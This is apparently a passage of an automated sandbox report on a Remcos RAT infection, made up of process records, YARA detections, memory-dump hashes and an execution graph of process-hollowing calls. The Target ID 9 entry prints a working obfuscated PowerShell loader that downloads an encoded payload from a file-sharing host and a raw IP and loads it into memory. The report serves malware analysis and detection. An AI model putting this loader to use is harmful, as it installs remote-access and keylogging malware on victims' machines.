                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:8
                                                                            Start time:03:44:21
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:9
                                                                            Start time:03:44:22
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"
                                                                            Imagebase:0xc20000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            Has exited:true

                                                                            Target ID:13
                                                                            Start time:03:44:47
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                            Imagebase:0x8c0000
                                                                            File size:108'664 bytes
                                                                            MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.4110277483.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            Has exited:false

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.1672983251.00000000064C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_64c0000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                              • Instruction ID: e013fd4d408da2bd32ca7eb40781fe97a89a7e4ec22f50670455a74ea11294c7
                                                                              • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                              • Instruction Fuzzy Hash:
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1827791146.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7310000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q$tP^q
                                                                              • API String ID: 0-309238000
                                                                              • Opcode ID: ba8071269d6796bd95c0928efbea60cc47badde0caa544751f2f50a4f20f5103
                                                                              • Instruction ID: b7ea3ad4c82fcba8a3ceb960ea69694bb0b4dcb1be3caf03f4173bf566788c4c
                                                                              • Opcode Fuzzy Hash: ba8071269d6796bd95c0928efbea60cc47badde0caa544751f2f50a4f20f5103
                                                                              • Instruction Fuzzy Hash: 06F1EAB1B002099FDB18DF68C814AAABFE6BFC5710F248469E9099F351DE31DC46C791
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1827791146.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7310000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q$tP^q
                                                                              • API String ID: 0-309238000
                                                                              • Opcode ID: 0ed3931e6e9b2426df51d69619ff0b8cdb18122d1d7622aded48dbe8965a2b2d
                                                                              • Instruction ID: 66b6b8ab03f5635be8b8e1d9bfc6ccf4d37d0d379fe8586be6bed6f0fd369bd6
                                                                              • Opcode Fuzzy Hash: 0ed3931e6e9b2426df51d69619ff0b8cdb18122d1d7622aded48dbe8965a2b2d
                                                                              • Instruction Fuzzy Hash: F25136B1B04314AFDB289A688810B6ABFE6EFC9710F14841AE549DF381CA71DD85C7A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1827791146.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7310000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q
                                                                              • API String ID: 0-2862610199
                                                                              • Opcode ID: 3baca0964a7fdcef1cf9fc54e56a89c66238cf30f6b9415df9d1989ef3a31c63
                                                                              • Instruction ID: 011e21df52f033b2cfefc738e10681dd110eb33bfe01097620a4432064fdbe29
                                                                              • Opcode Fuzzy Hash: 3baca0964a7fdcef1cf9fc54e56a89c66238cf30f6b9415df9d1989ef3a31c63
                                                                              • Instruction Fuzzy Hash: 6AA1E6B1A00209DBDB18DF58C444AAABBB2FF85710F258499EA099F351DB31EC46CB91
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1816312916.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_9bd000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 73879cdd43993cb675a0e8d271a0b3ebd6907d00a495e86162873f200a77333f
                                                                              • Instruction ID: a5ad18fd11258feea396382e91a68a14e5f5a489ae173ba6aa26cf7d642d42a6
                                                                              • Opcode Fuzzy Hash: 73879cdd43993cb675a0e8d271a0b3ebd6907d00a495e86162873f200a77333f
                                                                              • Instruction Fuzzy Hash: DE012B3100B3009AE7105E25CE84BA7BF9CEF41334F18C829EC080F146D679D841C6B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1816312916.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_9bd000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1556306bbaafadb4a51e9a36cd3cb7f16eb38f893cfe047bdded5d812887dc2b
                                                                              • Instruction ID: 14cac7bd6452c6e1297568cc35d6e8da172971f906a073852b31a5565dab4b73
                                                                              • Opcode Fuzzy Hash: 1556306bbaafadb4a51e9a36cd3cb7f16eb38f893cfe047bdded5d812887dc2b
                                                                              • Instruction Fuzzy Hash: 4AF0C272006340AEE7108E16CD84BA2FFACEB51338F18C45AED480E286C2799845CAB0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1827791146.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7310000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$X=Zl$$^q$$^q
                                                                              • API String ID: 0-450762304
                                                                              • Opcode ID: ecfb6f92f2b1e1b9cfe5f5e021c9f185e3fccd057db5453a838c3c2e02ffdfbd
                                                                              • Instruction ID: f06a09e6f679ded23a200bf72cc3008338cc6222f79e66eb135f9646074074f1
                                                                              • Opcode Fuzzy Hash: ecfb6f92f2b1e1b9cfe5f5e021c9f185e3fccd057db5453a838c3c2e02ffdfbd
                                                                              • Instruction Fuzzy Hash: 495127B1B043098FDB2C9A39C8447AABBF6AFC1310F14846AD489CF655DB31D8C5CB91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1827791146.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7310000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                              • API String ID: 0-2049395529
                                                                              • Opcode ID: fb14e92bd8c8605a92c103278411d3d5c80e3ffb8e68d09266d048cc59be00a4
                                                                              • Instruction ID: 875eb07a69a0faf30f0ab4415b5e0cca18bb64b79e9d81bd1795b175aa34290c
                                                                              • Opcode Fuzzy Hash: fb14e92bd8c8605a92c103278411d3d5c80e3ffb8e68d09266d048cc59be00a4
                                                                              • Instruction Fuzzy Hash: 7A0149B0B493850FD72E12381C205666FBA6FC291032A84ABD085DF35BCE158C8A83A3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1712593291.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_77d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                              • API String ID: 0-1420252700
                                                                              • Opcode ID: 4513388f03ee4765806cfb02385c6600b35f64597b0a40c93f1032c7fe57e808
                                                                              • Instruction ID: 1318031e67eb8ce75a0bfd2f2e88f11110e4ac5b987a87a2c5eb71dd393abd7f
                                                                              • Opcode Fuzzy Hash: 4513388f03ee4765806cfb02385c6600b35f64597b0a40c93f1032c7fe57e808
                                                                              • Instruction Fuzzy Hash: 1C1238B17043498FCB258B68981076ABFB2AFC6351F5988AAD505CF352DF32CD46C7A1
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1706989909.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_48d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 47367f77185f50f8ccc51345f2094af38a7105db29b5474ff40a555ec8385f56
                                                                              • Instruction ID: 88bd5d06bbcf8083f9696d36e1511ccf04bd493d3dfe9d6dba3b3840cc489241
                                                                              • Opcode Fuzzy Hash: 47367f77185f50f8ccc51345f2094af38a7105db29b5474ff40a555ec8385f56
                                                                              • Instruction Fuzzy Hash: 84915A74A016458FCB15CF59C4989AEFBB1FF88310B248A99E815EB365C735FC91CBA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1706989909.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_48d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: aa53856b9be04a9e826e57eb1542ec7fc853d74b2b50a6e285e3c9e898fac3e4
                                                                              • Instruction ID: 9933a6aadbefe76d33716317c4d05b3d668e1ea6d9736cb3c1cc634273a3c00a
                                                                              • Opcode Fuzzy Hash: aa53856b9be04a9e826e57eb1542ec7fc853d74b2b50a6e285e3c9e898fac3e4
                                                                              • Instruction Fuzzy Hash: 3F41CD7190F3D56FC703DF6C89A059ABFB0AF46204B0906D7D084CB2A3D634E949CBA1
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1712593291.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_77d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9b8a1d2b35359500411f586fcb791db5c243c0644b9067ef58b49332c4f128f4
                                                                              • Instruction ID: b2daaebac195b5aad40e036d15d3e1347ab6077bfe85824dc530896f33e8bd0e
                                                                              • Opcode Fuzzy Hash: 9b8a1d2b35359500411f586fcb791db5c243c0644b9067ef58b49332c4f128f4
                                                                              • Instruction Fuzzy Hash: 0F4127F4B0030ADFDB258B258860A797BF2AF85390F9E8895D5049F256CB31DD45CBA2
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1706989909.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_48d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a441e461d4b8aba0831307918834b02300c8670a8a46d0b040478e87a90b7afe
                                                                              • Instruction ID: f210ef4a5976913d35fbb8a75893da86a9378cd4414a3e6539ad9f7bf7477e1b
                                                                              • Opcode Fuzzy Hash: a441e461d4b8aba0831307918834b02300c8670a8a46d0b040478e87a90b7afe
                                                                              • Instruction Fuzzy Hash: E44139B4A016059FCB0ACF58C5989AEFBB1FF48310B158A99D815AB364C736FC51CFA4
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1706989909.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_48d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f38508aa64a0b7009addd8c29a32db175393e93d769c416fc06e1ea2baffaf83
                                                                              • Instruction ID: fd1643046f711115e6c72d01bbe85ded44e1ce86de704c69ee77ca0fcca62067
                                                                              • Opcode Fuzzy Hash: f38508aa64a0b7009addd8c29a32db175393e93d769c416fc06e1ea2baffaf83
                                                                              • Instruction Fuzzy Hash: 8B218334B412448FC714CB6DD480AAABBE6EFC9314B1486A9D449DB365DB35FC02CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1706989909.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_48d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e89cdea323b809144169333332dd05c2d4bc76e8aaf5c135cfebc8cc420c59c9
                                                                              • Instruction ID: 7ac687afa029fc1b0c2744a5a97bb34b4039ca3b02c3eb7c7e85f486aa817b65
                                                                              • Opcode Fuzzy Hash: e89cdea323b809144169333332dd05c2d4bc76e8aaf5c135cfebc8cc420c59c9
                                                                              • Instruction Fuzzy Hash: 4011E6B4A016199FCB04CF99D5809AEFBB1FF89310B1486A9E909EB355C731FD45CBA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1706661409.00000000047BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 047BD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_47bd000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 763a75a98ec1df24236bbb1ad422072b25d59b0fc312c21937447e2e0ed1fafb
                                                                              • Instruction ID: 571efce19b5a738cb6ffd2851cd446b7bdd076aa3ae8c666c4cdaa4898e068c2
                                                                              • Opcode Fuzzy Hash: 763a75a98ec1df24236bbb1ad422072b25d59b0fc312c21937447e2e0ed1fafb
                                                                              • Instruction Fuzzy Hash: 6701F7311097409AE7204E26D9847A7BF98EF41324F08C82AEC884A346C279A841CAF1
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1706661409.00000000047BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 047BD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_47bd000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9d2828ad7a89f39469441eb78abe9e5db0aad1e4c4a3a6044b06ccb12b30fae3
                                                                              • Instruction ID: 5a86a8175831ce1ba73eed8da3f322cbaf5ec3191de87db917216a9ef7adc75c
                                                                              • Opcode Fuzzy Hash: 9d2828ad7a89f39469441eb78abe9e5db0aad1e4c4a3a6044b06ccb12b30fae3
                                                                              • Instruction Fuzzy Hash: 0201526100E3C05ED7124B259994752BFB4EF53224F1DC4DBD8888F293C2695849C7B2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1712593291.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_77d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                              • API String ID: 0-1608119003
                                                                              • Opcode ID: e276b0e68015009897c4eccf073e4ef563274279a5c737353464641e689884fc
                                                                              • Instruction ID: a9816ee14c3b5b82b4d0bf8701fe287517541430e1f6cef1e253ebc86fdb230c
                                                                              • Opcode Fuzzy Hash: e276b0e68015009897c4eccf073e4ef563274279a5c737353464641e689884fc
                                                                              • Instruction Fuzzy Hash: BBF14AB5B043098FDB248B6898046AABBF6AFD5360F59887AD405CF351DE31DC46C7A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1712593291.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_77d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                              • API String ID: 0-1608119003
                                                                              • Opcode ID: 399ab8c50b3344a7f7b83f1f442de312706a718cdc3c61c859a6f67942d346d7
                                                                              • Instruction ID: 542d06356be4a3d89781b4052aad5a15dd49003c350a3f41ce3ecda84a303985
                                                                              • Opcode Fuzzy Hash: 399ab8c50b3344a7f7b83f1f442de312706a718cdc3c61c859a6f67942d346d7
                                                                              • Instruction Fuzzy Hash: C1A138B17043568FCB258A799810A7ABFF6AFC5660F18887BD446CF252DA31CC45CBE1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1712593291.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_77d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q
                                                                              • API String ID: 0-1041444323
                                                                              • Opcode ID: 5fedf7af9b5d0891d540db14b40ac4c66d1d7130f6dd7305e3c496fe2a5f8248
                                                                              • Instruction ID: c85018e0f5f21f87f40aba704b871db819a5ba39c30dcf95d85834a6464d4c0f
                                                                              • Opcode Fuzzy Hash: 5fedf7af9b5d0891d540db14b40ac4c66d1d7130f6dd7305e3c496fe2a5f8248
                                                                              • Instruction Fuzzy Hash: 43210B71B4E7464FC72A19382824265AFF65FC2990B6948AFC041DF36ADE61CC4AC3D6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1712593291.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_77d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: 5d01cd2595f87783b7cf42f6929d17e6226833f5b9d49132d84fc1e7cae107e5
                                                                              • Instruction ID: 70c7c12380d10d08f8d07d0c69f14d3dc25704fd46aa243f9b888d57ead8728b
                                                                              • Opcode Fuzzy Hash: 5d01cd2595f87783b7cf42f6929d17e6226833f5b9d49132d84fc1e7cae107e5
                                                                              • Instruction Fuzzy Hash: C8218EB1B04306DBDB34592E5C00B276BE69BC5750F64882AE405DF385ED32EC418362
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2468740936.000000000318D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0318D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_318d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d5f4401f1956e2b1d56d9a0ec663156510656a7e16f724edd2d89fbfe7a46dea
                                                                              • Instruction ID: 69e83898ca39be923af3cc3953a4558efe4b249e35f7b189916b8597b6827757
                                                                              • Opcode Fuzzy Hash: d5f4401f1956e2b1d56d9a0ec663156510656a7e16f724edd2d89fbfe7a46dea
                                                                              • Instruction Fuzzy Hash: E001F7310093049BE714EB25ED84767FF98EF49324F1CC569EC484B286C779D881CAB5
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2468740936.000000000318D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0318D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_318d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c2afb070e45e6cbda80b9a1f98a98fb3f7b1e6efbf95904c4bdada69f150b0f8
                                                                              • Instruction ID: 86d447a8382bba5fa9b3dc0d2905306d501773f566948dfaf8062e651ef7ee81
                                                                              • Opcode Fuzzy Hash: c2afb070e45e6cbda80b9a1f98a98fb3f7b1e6efbf95904c4bdada69f150b0f8
                                                                              • Instruction Fuzzy Hash: D2012D6200E3C09FD7128B259C94B52BFB4EF47224F1D85CBD8888F1A7C2699849CB72
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2469949970.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_32b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eba1c840f046965727fa12c6becdc5d5014e780207999e0c1dc0b471ea1082c2
                                                                              • Instruction ID: 83da499ecc74b42cb0166685eae40bc5dd794915b94860cd5f6d35b6f8697672
                                                                              • Opcode Fuzzy Hash: eba1c840f046965727fa12c6becdc5d5014e780207999e0c1dc0b471ea1082c2
                                                                              • Instruction Fuzzy Hash: 35F0D435A001099FCB15CF9DD990AEEF7B1FF88324F248159E555A72A1C736AC62CB60

                                                                              Execution Graph

                                                                              Execution Coverage: 6.8%
                                                                              Dynamic/Decrypted Code Coverage: 0%
                                                                              Signature Coverage: 33.9%
                                                                              Total number of Nodes: 62
                                                                              Total number of Limit Nodes: 5
                                                                              execution_graph 11548 4ba99a7 11549 4ba9991 11548->11549 11551 4ba9a4d 11549->11551 11553 4baa024 11549->11553 11550 4ba9aa5 11554 4baa382 11553->11554 11555 4baa3b9 11553->11555 11554->11555 11556 4baa3d4 11554->11556 11580 4baa024 8 API calls 11554->11580 11581 4baa3f0 11554->11581 11555->11550 11565 4baaaf4 11556->11565 11605 4ba8f44 11556->11605 11558 4baacd5 CreateProcessW 11561 4baad49 11558->11561 11559 4baa4f8 11560 4ba8f50 Wow64SetThreadContext 11559->11560 11559->11565 11562 4baa563 11560->11562 11563 4baa676 VirtualAllocEx 11562->11563 11562->11565 11577 4baa9e8 11562->11577 11564 4baa6c3 11563->11564 11564->11565 11566 4baa711 VirtualAllocEx 11564->11566 11568 4baa765 11564->11568 11565->11558 11565->11577 11566->11568 11567 4ba8f68 WriteProcessMemory 11569 4baa7af 11567->11569 11568->11565 11568->11567 11568->11577 11569->11565 11570 4baa8f9 11569->11570 11569->11577 11578 4ba8f68 WriteProcessMemory 11569->11578 11570->11565 11571 4ba8f68 WriteProcessMemory 11570->11571 11572 4baa922 11571->11572 11572->11565 11573 4ba8f74 Wow64SetThreadContext 11572->11573 11572->11577 11574 4baa997 11573->11574 11574->11565 11575 4baa99f 11574->11575 11576 4baa9a8 ResumeThread 11575->11576 11575->11577 11576->11577 11577->11550 11578->11569 11580->11554 11582 4baa3ee 11581->11582 11583 4ba8f44 CreateProcessW 11582->11583 11591 4baaaf4 11582->11591 11585 4baa4f8 11583->11585 11584 4baacd5 CreateProcessW 11587 4baad49 11584->11587 11585->11591 11609 4ba8f50 11585->11609 11588 4baa563 11589 4baa676 VirtualAllocEx 11588->11589 11588->11591 11603 4baa9e8 11588->11603 11590 4baa6c3 11589->11590 11590->11591 11592 4baa711 VirtualAllocEx 11590->11592 11594 4baa765 11590->11594 11591->11584 11591->11603 11592->11594 11594->11591 11594->11603 11613 4ba8f68 11594->11613 11595 4baa7af 11595->11591 11596 4baa8f9 11595->11596 11595->11603 11604 4ba8f68 WriteProcessMemory 11595->11604 11596->11591 11597 4ba8f68 WriteProcessMemory 